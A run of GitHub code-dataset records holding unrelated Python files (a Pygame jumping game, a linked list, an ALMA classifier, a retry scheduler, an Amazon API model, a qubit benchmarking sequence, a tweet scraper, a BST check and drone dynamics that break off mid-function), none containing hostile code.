20:\r\n\t\t\tgravity += 0.5\r\n\t\ttimer.append(pygame.time.get_ticks()) # aby sa neskákalo stále\r\n\t\t# obrázok pri padaní\r\n\t\tif len(timer) > 5 and not jumped:\r\n\t\t\tfox.image = 'jumper-1'\r\n\t\t\tif len(timer) > 5:\r\n\t\t\t\tfox.image = 'jumper-fall'\r\n\r\n\t# hýbanie s postavičkou doľava a doprava\r\n\t# obrázky doprava a doľava a skor doprava a doľava\r\n\t# ak prídamé 'and allowx' tak zakážem hýbanie pri padaní \r\n\tif (keyboard.left):\r\n\t\tif (fox.x > 40) and (fox_x_velocity > -8):\r\n\t\t\tfox_x_velocity -= 2\r\n\t\t\tfox.image = 'jumper-left'\r\n\t\t\tif (keyboard.left) and jumped:\r\n\t\t\t\tfox.image = 'jumper-jleft'\r\n\tif (keyboard.right):\r\n\t\tif (fox.x < 760) and (fox_x_velocity < 8):\r\n\t\t\tfox_x_velocity += 2\t\r\n\t\t\tfox.image = 'jumper-right'\r\n\t\t\tif (keyboard.right) and jumped:\r\n\t\t\t\tfox.image = 'jumper-jright'\r\n\r\n\tfox.x += fox_x_velocity\r\n\r\n\t#rýchlosť\r\n\tif fox_x_velocity > 0:\r\n\t\tfox_x_velocity -= 1\r\n\tif fox_x_velocity < 0:\r\n\t\tfox_x_velocity += 1\r\n\r\n\tif fox.x < 50 or fox.x > 750:\r\n\t\tfox_x_velocity = 0\r\n\r\n\t# skákanie\r\n\tif (keyboard.up) and collidecheck() and not jumped:\r\n\t\tjumping = True\r\n\t\tjumped = True\r\n\t\tprvy_pohyb = True\r\n\t\tclock.schedule_unique(jumpedrecently, 0.5)\r\n\t\tfox.image = 'jumper-1'\r\n\t\tfox_y_velocity = 95 # optimálne číslo kvôli gravitácii\r\n\tif jumping and fox_y_velocity > 25:\r\n\t\tfox_y_velocity = fox_y_velocity - ((100 - fox_y_velocity)/2)\r\n\t\tfox.y -= fox_y_velocity/3 # výška skoku\r\n\telse:\r\n\t\tfox_y_velocity = 0\r\n\t\tjumping = False\r\n\r\n\r\n\r\n\r\ndef collidecheck():\r\n\tcollide = False\r\n\tfor i in schody:\r\n\t\tif fox.colliderect(i):\r\n\t\t\tcollide = True\r\n\treturn collide\r\n\r\ndef jumpedrecently():\r\n\tglobal jumped\r\n\tjumped = False\r\n\r\n# vytvorenie prvých schodíkov na random pozíciách\r\ndef generate_first_schody():\r\n\tglobal posledny_schod_y\r\n\tvytvorene_schodiky = []\r\n\r\n\thl_schod = Rect((250, posledny_schod_y), (300, 2))\r\n\tvytvorene_schodiky.append(hl_schod)\r\n\r\n\twhile not (posledny_schod_y < 100):\r\n\t\tschodik_x = random.randrange(15, WIDTH - 315)\r\n\t\tschodik_y = random.randrange(posledny_schod_y - 130, posledny_schod_y - 100)\r\n\t\tjeden_schodik = Rect((schodik_x, schodik_y), (300, 2))\r\n\t\tposledny_schod_y = schodik_y\r\n\t\tvytvorene_schodiky.append(jeden_schodik)\r\n\r\n\treturn vytvorene_schodiky\r\n\r\n\r\nschody = generate_first_schody()\r\n\r\npgzrun.go()\r\n","repo_name":"Weirdo5858/Fox-Jump-Game","sub_path":"Liska_skoc(Fox_Jump).py","file_name":"Liska_skoc(Fox_Jump).py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"sk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31838286344","text":"from hashlib import new\nfrom tarfile import TarError\n\n\nclass LinkedNode():\n '''\n A node within a linked list\n \n Attributes\n ----------\n value : Any\n The value of the current node\n \n next : listNode | None\n The next node in the list, or None if current node is the tail\n '''\n \n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList():\n '''\n A list of linked nodes.\n \n Attributes\n ----------\n head : listNode | None\n First node in list. None if list empty\n \n tail : listNode | None\n Last node in the list. None if list is empty\n \n \n Methods\n --------\n append(self, value)\n \n prepend(self, value)\n \n insert_after(self, target, new_value)\n \n remove(self, value)\n \n __str__(self)\n '''\n \n def __init__(self):\n self.head = None #First node\n self.tail = None #Last node\n \n def append(self, new_node: LinkedNode):\n '''\n Append a new value after the tail\n '''\n if self.head == None:\n self.head = new_node\n self.tail = self.head\n \n else:\n self.tail.next = new_node\n self.tail = new_node\n \n def prepend(self, new_node: LinkedNode):\n '''\n Prepend a new value in the first position (head)\n '''\n \n # List empty\n if self.head == None:\n self.head = new_node\n self.tail = self.head\n \n # List not empty\n else:\n new_node.next = self.head\n self.head = new_node\n \n def insert_after(self, target_node: LinkedNode, new_node: LinkedNode):\n '''\n Insert a node after the target value. Inserts no node if \n target not found.\n '''\n \n if target_node == None:\n self.prepend(new_node)\n \n elif target_node is self.tail:\n self.append(new_node)\n \n else:\n new_node.next = target_node.next\n target_node.next = new_node\n \n def remove_after(self, target_node: LinkedNode):\n '''\n Remove the target value\n '''\n if self.head == None:\n return\n \n if target_node == None:\n removed_node = self.head\n self.head = self.head.next\n \n elif target_node is self.tail:\n return None\n \n elif target_node.next is self.tail:\n removed_node = target_node.next\n target_node.next = target_node.next.next\n self.tail = target_node.next\n \n else:\n removed_node = target_node.next\n target_node.next = target_node.next.next\n \n removed_node.next = None\n return removed_node\n \n def __str__(self):\n '''\n Print the linked list in traditional python list format\n '''\n if self.head == None:\n return str([])\n \n current_node = self.head\n node_values = [current_node.value]\n \n while current_node.next != None:\n current_node = current_node.next\n node_values.append(current_node.value)\n \n return str(node_values)\n\n\nif __name__ == '__main__':\n \n nodeA = LinkedNode(1)\n nodeB = LinkedNode(2)\n nodeC = LinkedNode(3)\n \n myList = LinkedList()\n myList.append(nodeA)\n myList.append(nodeB)\n myList.insert_after(None, nodeC)\n print(myList.remove_after(nodeC))\n \n \n print(myList)\n print(myList.head.value)\n print(myList.tail.value)\n ","repo_name":"Tanner-Gladson/dataStructures","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"366001713","text":"import numpy as np\nimport math\n\nfrom numpy import linalg as LA\n\nfrom . __base import OnlineLearningModel\n\n\nclass ALMA(OnlineLearningModel):\n \"\"\"A New Approximate Maximal Margin Classification Algorithm.\n \n Gentile, C.\n A New Approximate Maximal Margin Classification Algorithm \n Journal of Machine Learning Research, 101, 2, 213-242\n\n Attributes:\n p (int, optional): ALMA's order with p strictly greater than 0.\n Defaults to 2.\n C (:obj:`float`, optional): Parameter of ALMA with C strictly greater\n than 0. Defaults to 1.\n alpha (:obj:`float`, optional): The sensitivity of the model. `alpha` \n takes values between 0 (non-inclusive). Defaults to 1.\n num_iterations (:obj:`int`, optional): Number of iterations \n to run the training for. Defaults to 1.\n random_state (:obj:`int`, optional): The random seed to use \n with the pseudo-random generator. Defaults to `None`.\n positive_label (:obj:`int`, optional): The number in the output\n field that represents the positive label. The value passed\n should be different than -1. Defaults to 1.\n class_weight (:obj:`dict`, optional): Represents the relative \n weight of the labels in the data. Useful for imbalanced \n classification tasks.\n\n Raises:\n AssertionError: if `positive_label` is equal to -1.\n\n \"\"\"\n \n def __init__(\n self, \n alpha=1.0, \n p=2, \n C=1, \n num_iterations=1, \n random_state=None,\n class_weight=None, \n positive_label=1\n ):\n super().__init__(\n num_iterations=num_iterations, \n random_state=random_state,\n positive_label=positive_label, \n class_weight=class_weight\n )\n\n self._p = p\n self._C = C\n self._alpha = alpha\n\n self._B = 1\n self._k = 0\n\n def _update(self, x: np.ndarray, y: int):\n \"\"\"Updates the weight vector in case a mistake occured.\n \n When presented with a data point, this method evaluates\n the error and based on the result, updates or not the \n weights vector.\n\n Args:\n x (:obj:`np.ndarray` or `list`): An array representing\n one single data point. Array needs to be 2D.\n y (`int`): Output value for the data point. Takes value\n between 1 and -1.\n\n Returns:\n None\n\n Raises:\n IndexError: if the value x is not 2D.\n \"\"\"\n gamma_k = self._B * math.sqrt(self._p - 1) / math.sqrt(self._k)\n if y * self.weights.dot(x) <= (1 - self._alpha) * gamma_k:\n eta_k = ((self._C / (math.sqrt(self._p - 1) * math.sqrt(self._k)))\n * self.class_weight_[y])\n self.weights = self.weights + eta_k * y * x\n norm_w = LA.norm(self.weights, ord=self._p)\n self.weights = self.weights / (max(1, norm_w))\n self._k += 1\n\n def _setup(self, X):\n \"\"\"Initializes the values for the model' parameters.\n\n Based on the data in argument, this method initializes \n the parameters `k` and `B` of the ALMA algorithm.\n\n Args:\n X (:obj:`numpy.ndarray`): Input data with n rows and\n m columns\n\n Returns:\n None\n \"\"\"\n self._k = 1\n self._B = 1/self._alpha\n\n def get_params(self, deep=True):\n \"\"\"Get parameters for this estimator.\n\n This function is for use with hyper-parameter tuning utilities\n such as `GridSearchCV`_.\n\n Args:\n deep(:obj:`bool`, optional): If True, will return the parameters\n for this estimator and contained sub-objects that are \n estimators. Defaults to True.\n\n .. _GridSearchCV:\n https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html\n\n \"\"\"\n params = super().get_params()\n params['p'] = self._p\n params['C'] = self._C\n params['alpha'] = self._alpha\n\n return params\n","repo_name":"boladjivinny/olpy","sub_path":"olpy/classifiers/alma.py","file_name":"alma.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"17330048415","text":"import asyncio\nimport sched\nimport signal\nimport sys\nfrom sched import Event\nfrom time import monotonic, sleep\nfrom types import FrameType\nfrom typing import Any, Callable, Union\n\nfrom ._types import DelayValue, SignalHandler, TimeoutValue\n\ntry:\n ITIMER_REAL = signal.ITIMER_REAL\nexcept AttributeError:\n ITIMER_REAL = 0\n\n__all__ = (\"AbstractScheduler\", \"Scheduler\", \"AsyncScheduler\",\n \"Event\", \"AsyncEvent\",)\n\n\nclass AbstractScheduler:\n def get_remaining(self, event: Event) -> TimeoutValue:\n raise NotImplementedError() # pragma: no cover\n\n def new(self, seconds: TimeoutValue, handler: Callable[[], None]) -> Event:\n raise NotImplementedError() # pragma: no cover\n\n def cancel(self, event: Union[Event, None]) -> None:\n raise NotImplementedError() # pragma: no cover\n\n\nclass Scheduler(AbstractScheduler):\n def __init__(self,\n timefunc: Callable[[], TimeoutValue] = monotonic,\n delayfunc: Callable[[DelayValue], Any] = sleep,\n itimer: int = ITIMER_REAL) -> None:\n self._timefunc = timefunc\n self._delayfunc = delayfunc\n self._itimer = itimer\n self._scheduler = sched.scheduler(timefunc, delayfunc)\n self._orig_handler = None # type: Union[SignalHandler, None]\n\n def get_remaining(self, event: Event) -> TimeoutValue:\n return max(0, event.time - self._timefunc())\n\n def _next_event(self) -> TimeoutValue:\n return self.get_remaining(self._scheduler.queue[0]) if self._scheduler.queue else 0\n\n def new(self, seconds: TimeoutValue, handler: Callable[[], None]) -> Event:\n orig_handler = signal.getsignal(signal.SIGALRM)\n if not isinstance(orig_handler, type(self)):\n self._orig_handler = orig_handler\n\n priority = -len(self._scheduler.queue)\n event = self._scheduler.enter(seconds, priority, handler)\n\n signal.signal(signal.SIGALRM, self) # type: ignore\n signal.setitimer(self._itimer, self._next_event())\n\n return event\n\n def cancel(self, event: Union[Event, None]) -> None:\n try:\n self._scheduler.cancel(event) # type: ignore\n except ValueError:\n pass\n\n if self._scheduler.empty():\n signal.alarm(0)\n if self._orig_handler:\n signal.signal(signal.SIGALRM, self._orig_handler)\n self._orig_handler = None\n else:\n signal.setitimer(self._itimer, self._next_event())\n\n def __call__(self, signum: int, frame: FrameType) -> None:\n self._scheduler.run(blocking=False)\n\n\nclass AsyncEvent(Event):\n pass\n\n\nclass AsyncScheduler(AbstractScheduler):\n @property\n def _loop(self) -> asyncio.AbstractEventLoop:\n return asyncio.get_event_loop()\n\n def get_remaining(self, event: Event) -> TimeoutValue:\n return max(0, event.time - self._loop.time())\n\n def new(self, seconds: TimeoutValue, handler: Callable[[], None]) -> AsyncEvent:\n when = self._loop.time() + seconds\n action = self._loop.call_at(when, handler)\n args = {\n \"time\": when,\n \"priority\": 0,\n \"action\": action.cancel,\n \"argument\": (),\n \"kwargs\": {},\n }\n if sys.version_info >= (3, 10): # pragma: no cover\n args[\"sequence\"] = 0\n return AsyncEvent(**args) # type: ignore\n\n def cancel(self, event: Union[Event, None]) -> None:\n if event is not None:\n event.action()\n","repo_name":"tsv1/rtry","sub_path":"rtry/_scheduler.py","file_name":"_scheduler.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33898126773","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar\n\nimport attr\n\nif TYPE_CHECKING:\n from ..models.invalid_item_reason import InvalidItemReason\n\n\nT = TypeVar(\"T\", bound=\"InvalidReturnItem\")\n\n\n@attr.s(auto_attribs=True)\nclass InvalidReturnItem:\n r\"\"\"An item that is invalid for return.\n\n Attributes:\n seller_return_item_id (str): An identifier assigned by the seller to the return item.\n seller_fulfillment_order_item_id (str): The identifier assigned to the item by the seller when the fulfillment\n order was created.\n invalid_item_reason (InvalidItemReason): The reason that the item is invalid for return.\n \"\"\"\n\n seller_return_item_id: str\n seller_fulfillment_order_item_id: str\n invalid_item_reason: \"InvalidItemReason\"\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n seller_return_item_id = self.seller_return_item_id\n seller_fulfillment_order_item_id = self.seller_fulfillment_order_item_id\n invalid_item_reason = self.invalid_item_reason.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"sellerReturnItemId\": seller_return_item_id,\n \"sellerFulfillmentOrderItemId\": seller_fulfillment_order_item_id,\n \"invalidItemReason\": invalid_item_reason,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.invalid_item_reason import InvalidItemReason\n\n d = src_dict.copy()\n seller_return_item_id = d.pop(\"sellerReturnItemId\")\n\n seller_fulfillment_order_item_id = d.pop(\"sellerFulfillmentOrderItemId\")\n\n invalid_item_reason = InvalidItemReason.from_dict(d.pop(\"invalidItemReason\"))\n\n result = cls(\n seller_return_item_id=seller_return_item_id,\n seller_fulfillment_order_item_id=seller_fulfillment_order_item_id,\n invalid_item_reason=invalid_item_reason,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/fulfillment_outbound_2020_07_01/models/invalid_return_item.py","file_name":"invalid_return_item.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7079216994","text":"import numpy as np\nfrom common.lib.servers.Pulser2.pulse_sequences.pulse_sequence import pulse_sequence\n\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_X import clifford_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_minus_X import clifford_minus_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_Y import clifford_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_minus_Y import clifford_minus_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_Z import clifford_Z\n\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_X import pauli_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_minus_X import pauli_minus_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_Y import pauli_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_minus_Y import pauli_minus_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_Id import pauli_Id\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.single_sequence_rb_testing import single_sequence_rb_testing\n\n\nclass randomized_benchmarking_pulse(pulse_sequence):\n\n required_parameters = [\n ('RandomizedBenchmarking', 'file_selection'),\n ('MicrowaveInterrogation', 'power'),\n ('MicrowaveInterrogation', 'ttl_switch_delay'),\n ('Line_Selection', 'qubit'),\n ('Transitions', 'qubit_0'),\n ('ddsDefaults', 'qubit_dds_freq'),\n ('Pi_times', 'qubit_0'),\n ]\n\n required_subsequences = [\n clifford_X,\n clifford_minus_X,\n clifford_Y,\n clifford_minus_Y,\n clifford_Z,\n pauli_X,\n pauli_minus_X,\n pauli_Y,\n pauli_minus_Y,\n pauli_Id,\n single_sequence_rb_testing\n ]\n\n def sequence(self):\n p = self.parameters\n\n pulse_dict = {'[0.0, 0.5, 1.0]': clifford_X,\n '[180.0, 0.5, 1.0]': clifford_minus_X,\n '[90.0, 0.5, 1.0]': clifford_Y,\n '[270.0, 0.5, 1.0]': clifford_minus_Y,\n '[0.0, 1.0, 1.0]': pauli_X,\n '[180.0, 1.0, 1.0]': pauli_minus_X,\n '[90.0, 1.0, 1.0]': pauli_Y,\n '[270.0, 1.0, 1.0]': pauli_minus_Y,\n '[0.0, 1.0, 0.0]': pauli_Id,\n '[0.0, 0.5, 0.0]': clifford_Z}\n\n # gets the file with the pulse sequence\n rb_pulses = np.loadtxt(p.RandomizedBenchmarking.file_selection, delimiter=',')\n # num_reps = 10\n # for i in range(num_reps):\n # self.addSequence(single_sequence_rb_testing)\n for pulse in rb_pulses:\n self.addSequence(pulse_dict[str(list(pulse))])\n","repo_name":"johnpalsberg/John-Palsberg","sub_path":"QsimMaster/scripts/pulse_sequences/sub_sequences/RandomizedBenchmarking.py","file_name":"RandomizedBenchmarking.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26405911865","text":"# program menghitung luas dan volume balok\r\n\r\n# Pertemuan 1\r\n# Programmer: Mohammad rizky imansyah\r\n# Tanggal: 11 November 2023\r\n\r\npanjang = 10;\r\nlebar = 25;\r\ntinggi = 12;\r\n\r\nluasBalok = (2*panjang*lebar) + (2*panjang*tinggi) + (2*lebar*tinggi);\r\nvolumeBalok = panjang * lebar * tinggi;\r\n\r\nprint('luas balok:', luasBalok)\r\nprint('volume balok:', volumeBalok)","repo_name":"WalterWhite891/Mohammad-Rizky-Imansyah","sub_path":"Pertemuan 1/Balok.py","file_name":"Balok.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25104379582","text":"from datetime import timedelta, date\nimport twint\nimport pandas as pd\n\nresponse = input(\"Please enter Keyword: \")\n\nprint(\"Fetch twitter data for \"+ response + \" company keyword....\")\n\nkeyword = response\n\nstart = date(2019, 7, 15)\nend = date(2020, 7, 10)\ndelta = end-start\ndateList = []\n\nfor i in range(delta.days):\n if (i % 7 == 0) or (i % 7 == 1) or (i % 7 == 2) or (i % 7 == 3) or (i % 7 == 4):\n new_day = start + timedelta(i)\n print(new_day)\n dateList.append(new_day)\nprint(len(dateList))\nc = twint.Config()\nc.Store_object = True\nc.Pandas = True\nc.Search = keyword\nc.Limit = 50\nc.Lang = 'en'\n\n\ndf = pd.DataFrame()\nfor i in range(len(dateList)-1):\n dayTweets = []\n if (i+1) % 5 == 0:\n c.Since = str(dateList[i])\n c.Until = str(dateList[i]+timedelta(1))\n else:\n c.Since = str(dateList[i])\n c.Until = str(dateList[i+1])\n twint.run.Search(c)\n Tweets_df = twint.storage.panda.Tweets_df\n df = pd.concat([df, Tweets_df])\n\ndrop_columns = df.drop(columns = [\"id\", \"conversation_id\", \"created_at\", \"timezone\", \"place\", \"hashtags\", \"cashtags\", \"user_id\", \"user_id_str\", \"username\", \"name\", \"day\", \"hour\", \"link\", \"retweet\",\"nlikes\",\"nreplies\",\"nretweets\",\"quote_url\",\"search\",\"near\",\"geo\",\"source\",\"user_rt_id\",\"user_rt\",\"retweet_id\",\"reply_to\",\"retweet_date\", \"translate\",\"trans_src\", \"trans_dest\"])\n\ndrop_columns['date'] = pd.to_datetime(drop_columns[\"date\"], format='%Y-%m-%d %H:%M:%S').dt.strftime('%Y-%m-%d')\ntweets_df = drop_columns.groupby(\"date\").agg(lambda x: x.tolist())\ntweets_df.to_csv('tweets.csv', index=False)\n","repo_name":"MehtaPlusTutoring-MLBootcamp20/Stock-Market-Prices","sub_path":"get_twitter_tweets.py","file_name":"get_twitter_tweets.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15196759965","text":"import sys\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def is_valid_bst(self, root):\n return self.is_valid_helper(root, -sys.maxsize - 1, sys.maxsize)\n\n def is_valid_helper(self, root: TreeNode, min_val: int, max_val: int) -> bool:\n if root is None:\n return True\n if root.val >= max_val or root.val <= min_val:\n return False\n return self.is_valid_helper(root.left, min_val, root.val) and self.is_valid_helper(root.right, root.val, max_val)\n\n\nif __name__ == '__main__':\n five = TreeNode(5)\n one = TreeNode(1)\n four = TreeNode(4)\n three = TreeNode(3)\n six = TreeNode(6)\n\n five.left = one\n five.right = four\n four.left = three\n four.right = six\n\n s = Solution()\n print(s.is_valid_bst(five))\n # Output: False\n\n # two = TreeNode(2)\n # two.left = one\n # two.right = three\n # print(s.is_valid_bst(two))\n # Output True\n\n\n # Example 1:\n\n # 2\n # / \\\n # 1 3\n\n # Input: [2,1,3]\n # Output: true\n # Example 2:\n\n # 5\n # / \\\n # 1 4\n # / \\\n # 3 6\n\n # Input: [5,1,4,null,null,3,6]\n # Output: false\n # Explanation: The root node's value is 5 but its right child's value is 4.\n ","repo_name":"nicasioca/leetcode","sub_path":"0098_validate_binary_search_tree.py","file_name":"0098_validate_binary_search_tree.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29446394831","text":"from abc import ABC, abstractmethod\n\nimport torch\nfrom torch import nn\n\nimport math\nimport numpy as np\n\nfrom gym.spaces import Box\n\nfrom system.base import System\n\n\nclass BaseDrone(System, ABC):\n\n def __init__(self, horizon, discrete_time, euler_time, initial_radius=0., initial=(0., 0., 0.),\n feasible_set=None, device=\"cpu\"):\n super(BaseDrone, self).__init__(horizon=horizon, device=device, feasible_set=feasible_set)\n # spaces\n self._observation_space = Box(low=-float(\"inf\"), high=float(\"inf\"), shape=(12,))\n self._action_space = Box(low=-float(\"inf\"), high=float(\"inf\"), shape=(4,))\n self._parameter_space = Box(low=-float(\"inf\"), high=float(\"inf\"), shape=(8,))\n\n # target equilibrium\n self.initial = torch.tensor([initial], device=self.device)\n\n # radius of initial position\n self.initial_radius = torch.tensor([initial_radius, initial_radius, initial_radius], device=self.device)\n\n # Euler integration\n self.euler_time = euler_time\n self.discrete_time = discrete_time\n\n # physical constants\n self.g = 9.81\n self.rho = 900.\n self.rho_air = 1.225\n self.pi = np.pi\n\n self.c_b = 1.\n self.c_d = 1.\n\n self.parameters = torch.tensor([np.nan] * 8, device=self.device)\n\n def project_parameters(self):\n \"\"\" performs parameters projection \"\"\"\n for i, (min_val, max_val) in enumerate(self.get_feasible_set().values()):\n with torch.no_grad():\n val_proj = self.parameters[:, i].clamp(min_val, max_val)\n\n for b in range(self.parameters.shape[0]):\n nn.init.constant_(self.parameters[b, i], val_proj[b].item())\n\n def set_parameters(self, parameters):\n \"\"\" set the parameters to fixed values \"\"\"\n self.parameters = parameters\n\n def initial_state(self, number_trajectories):\n \"\"\" samples \"number_trajectories\" initial states from P_0\n returns a tensor of shape (\"number_trajectories\", |S|) \"\"\"\n xyz = 2 * torch.rand(number_trajectories, 3, device=self.device) * self.initial_radius - self.initial\n state_not_xyz = torch.zeros((number_trajectories, self.observation_space.shape[0] - 3), device=self.device)\n\n return torch.cat([state_not_xyz, xyz], dim=-1)\n\n @abstractmethod\n def reward(self, states, actions, disturbances):\n \"\"\" reward function rho(s_t, a_t, xi_t) -> r_t\"\"\"\n raise NotImplementedError\n\n def _distance_omega(self, states, actions, disturbances):\n omega_1, omega_2, omega_3, omega_4 = actions.split(1, dim=-1)\n _, _, _, _, omega_1n, omega_2n, omega_3n, omega_4n = self._get_system_parameters()\n distance_omega = ((omega_1 - omega_1n).pow(2) + (omega_2 - omega_2n).pow(2)\n + (omega_3 - omega_3n).pow(2) + (omega_4 - omega_4n).pow(2))\n\n return distance_omega\n\n def dynamics(self, states, actions, disturbances):\n \"\"\" dynamics f(s_t, a_t, xi_t) -> s_t+1 \"\"\"\n s_next = states\n\n for _ in range(math.ceil(self.discrete_time / self.euler_time)):\n # linear evolution\n s_next = s_next + self._derivative(s_next, actions, disturbances) * self.euler_time\n\n # Euler angles are bounded (with a circular evolution)\n phi, theta, psi, p, q, r, u, v, w, x, y, z = s_next.split(1, dim=-1)\n\n # phi \\in ] -pi, pi]\n phi = self.circular_bound(phi, self.pi)\n\n # theta \\in ] -pi/2, pi/2]\n # theta = self.circular_bound(theta, self.pi)\n\n # phi \\in ] -pi, pi]\n psi = self.circular_bound(psi, self.pi)\n\n s_next = torch.cat([phi, theta, psi, p, q, r, u, v, w, x, y, z], dim=-1)\n\n return s_next\n\n def _derivative(self, states, actions, disturbances):\n \"\"\" computes the derivative of the state variables with the transition model \"\"\"\n # get the inertia and the mass\n i_x, i_y, i_z = self._get_inertia()\n m = self._get_mass()\n\n # get the motor forces on the system\n f_t, tau_x, tau_y, tau_z = self._get_motor_forces(actions)\n\n # get the state components\n phi, theta, psi, p, q, r, u, v, w, x, y, z = states.split(1, dim=-1)\n\n # get the wind disturbances and put the forces to the local frame\n glob_f_wx, glob_f_wy, glob_f_wz, tau_wx, tau_wy, tau_wz = (self.disturbance_to_force(states,\n actions,\n disturbances)\n .split(1, dim=-1))\n\n f_wx = ((torch.cos(theta) * torch.cos(psi)) * glob_f_wx\n + (torch.cos(theta) * torch.sin(psi)) * glob_f_wy\n - torch.sin(psi) * glob_f_wz)\n f_wy = ((torch.sin(phi) * torch.sin(theta) * torch.cos(psi) - torch.cos(phi) * torch.sin(psi)) * glob_f_wx\n + (torch.sin(phi) * torch.sin(theta) * torch.sin(psi) + torch.cos(phi) * torch.cos(psi)) * glob_f_wy\n + torch.sin(phi) * torch.cos(theta) * glob_f_wz)\n f_wz = ((torch.cos(phi) * torch.sin(theta) * torch.cos(psi) + torch.sin(phi) * torch.sin(psi)) * glob_f_wx\n + (torch.cos(phi) * torch.sin(theta) * torch.sin(psi) - torch.sin(phi) * torch.cos(psi)) * glob_f_wy\n + torch.cos(phi) * torch.cos(theta) * glob_f_wz)\n\n # compute the state derivative with newton's formula and the change of coordinates\n dot_p = (i_y - i_z) / i_x * r * q + (tau_x + tau_wx) / i_x\n dot_q = (i_z - i_x) / i_y * p * r + (tau_y + tau_wy) / i_y\n dot_r = (i_x - i_y) / i_z * p * q + (tau_z + tau_wz) / i_z\n\n dot_u = r * v - q * w - self.g * torch.sin(theta) + f_wx / m\n dot_v = p * w - r * u + self.g * torch.sin(phi) * torch.cos(theta) + f_wy / m\n dot_w = q * u - p * v + self.g * torch.cos(phi) * torch.cos(theta) + (f_wz - f_t) / m\n\n dot_x = ((torch.cos(theta) * torch.cos(psi)) * u\n + (torch.sin(phi) * torch.sin(theta) * torch.cos(psi) - torch.cos(phi) * torch.sin(psi)) * v\n + (torch.cos(phi) * torch.sin(theta) * torch.cos(psi) + torch.sin(phi) * torch.sin(psi)) * w)\n dot_y = ((torch.cos(theta) * torch.sin(psi)) * u\n + (torch.sin(phi) * torch.sin(theta) * torch.sin(psi) + torch.cos(phi) * torch.cos(psi)) * v\n + (torch.cos(phi) * torch.sin(theta) * torch.sin(psi) - torch.sin(phi) * torch.cos(psi)) * w)\n dot_z = (-torch.sin(psi) * u\n + torch.sin(phi) * torch.cos(theta) * v\n + torch.cos(phi) * torch.cos(theta) * w)\n\n dot_phi = p + torch.sin(phi) * torch.tan(theta) * q + torch.cos(phi) * torch.tan(theta) * r\n dot_theta = torch.cos(phi) * q - torch.sin(phi) * r\n dot_psi = (torch.sin(phi) / torch.cos(theta)) * q + (torch.cos(phi) / torch.cos(theta)) * r\n\n return torch.cat([dot_phi, dot_theta, dot_psi, dot_p, dot_q, dot_r, dot_u, dot_v, dot_w, dot_x, dot_y, dot_z],\n dim=-1)\n\n def _get_inertia(self):\n l, r_b, t, w, _, _, _, _ = self._get_system_parameters()\n\n i_x = (1 / 6.) * self.rho * l * t * (4 * l**2 + t**2)\n i_y = i_x.clone()\n i_z = (1 / 3.) * self.rho * l * w * (4 * l**2 + w**2) - (1 / 6.) * self.rho * w**4\n\n return i_x, i_y, i_z\n\n def _get_mass(self):\n l, r_b, t, w, _, _, _, _ = self._get_system_parameters()\n m = self.rho * t * w * (2 * (2 * l - w) + w)\n\n return m\n\n def _get_motor_forces(self, actions):\n # thrust (b) and drag (d) factors\n b, d = self._get_thrust_drag_factors()\n\n # get l\n l, _, _, _, _, _, _, _ = self._get_system_parameters()\n\n # actions correspond to the angular speeds of the rotors\n omega_1, omega_2, omega_3, omega_4 = actions.split(1, dim=-1)\n\n # force from the speed\n f_t = b * (omega_1**2 + omega_2**2 + omega_3**2 + omega_4**2)\n\n # torques from the speed\n 